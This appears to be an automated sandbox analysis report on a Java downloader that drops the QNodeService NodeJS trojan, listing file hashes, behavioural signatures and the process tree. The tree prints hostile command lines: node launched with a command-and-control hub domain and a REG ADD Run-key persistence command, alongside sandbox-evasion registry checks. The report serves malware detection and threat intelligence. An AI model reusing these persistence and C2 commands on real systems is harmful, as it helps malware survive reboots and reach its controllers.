Analysis
-
max time kernel
61s -
max time network
129s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
27-11-2020 05:47
Static task
static1
Behavioral task
behavioral1
Sample
trackinginfo~update.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
trackinginfo~update.jar
Resource
win10v20201028
General
-
Target
trackinginfo~update.jar
-
Size
67KB
-
MD5
abab4b8aef2f5249a6b84f9acf14085f
-
SHA1
c1d69dadcc0cb91179d843382e87790641fe94b4
-
SHA256
495498572e57e6f6260a7875cf56fb24829dbc6489c3930f8131925864b35465
-
SHA512
adf24caccec50b28b906338abf8f659b77fc76b875f401e46ab1cd5ce8799b72471047c5c0d706c90d8c1eace59ac486c1a83585647efd1f5bbdf8b92e510f20
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 188 node.exe 3636 node.exe 3332 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\3c2dc1af-0886-4a6f-bed8-9a5fc0d4a4cd = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab6e-171.dat js behavioral2/files/0x000100000001ab6e-176.dat js behavioral2/files/0x000100000001ab6e-180.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 28 wtfismyip.com 29 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 188 node.exe 188 node.exe 188 node.exe 188 node.exe 3636 node.exe 3636 node.exe 3636 node.exe 3636 node.exe 3332 node.exe 3332 node.exe 3332 node.exe 3332 node.exe 3332 node.exe 3332 node.exe 3332 node.exe 3332 node.exe 3332 node.exe 3332 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4068 wrote to memory of 1868 4068 java.exe 77 PID 4068 wrote to memory of 1868 4068 java.exe 77 PID 1868 wrote to memory of 188 1868 javaw.exe 81 PID 1868 wrote to memory of 188 1868 javaw.exe 81 PID 188 wrote to memory of 3636 188 node.exe 83 PID 188 wrote to memory of 3636 188 node.exe 83 PID 3636 wrote to memory of 3332 3636 node.exe 84 PID 3636 wrote to memory of 3332 3636 node.exe 84 PID 3332 wrote to memory of 4048 3332 node.exe 86 PID 3332 wrote to memory of 4048 3332 node.exe 86 PID 4048 wrote to memory of 3932 4048 cmd.exe 87 PID 4048 wrote to memory of 3932 4048 cmd.exe 87
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\trackinginfo~update.jar1⤵
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\e0be8eb6.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain lightstamps.website3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:188 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_rP7K0X\boot.js --hub-domain lightstamps.website4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_rP7K0X\boot.js --hub-domain lightstamps.website5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "3c2dc1af-0886-4a6f-bed8-9a5fc0d4a4cd" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "3c2dc1af-0886-4a6f-bed8-9a5fc0d4a4cd" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3932
-
-
-
-
-
-